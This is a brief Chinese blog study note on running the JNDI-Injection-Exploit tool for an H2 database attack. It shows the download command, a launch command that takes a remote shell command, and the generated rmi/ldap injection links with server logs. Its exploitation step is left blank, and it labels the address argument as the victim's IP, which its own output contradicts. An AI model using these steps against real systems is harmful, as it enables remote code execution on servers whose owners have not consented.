【笔记】JNDIInjectionExploit学习笔记

发表于 更新于 阅读次数:

前言

JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.(github

下载项目

1
wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

H2数据库未授权访问

漏洞利用前提

  • 攻击者端口号1099、1389、8180不被占用

监听端口

<shell>:远程执行的Shell命令
<ip>:受害者IP地址

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C <shell> -A <ip>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[ADDRESS] >> 127.0.0.1
[COMMAND] >> whoami
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/9anzqx
ldap://127.0.0.1:1389/9anzqx
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/67c5rl
ldap://127.0.0.1:1389/67c5rl
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/mukhs6

----------------------------Server Log----------------------------
2024-06-14 17:10:30 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2024-06-14 17:10:30 [RMISERVER]  >> Listening on 0.0.0.0:1099
2024-06-14 17:10:30 [LDAPSERVER] >> Listening on 0.0.0.0:1389

漏洞利用

完成

参考文献

哔哩哔哩——xiaodisec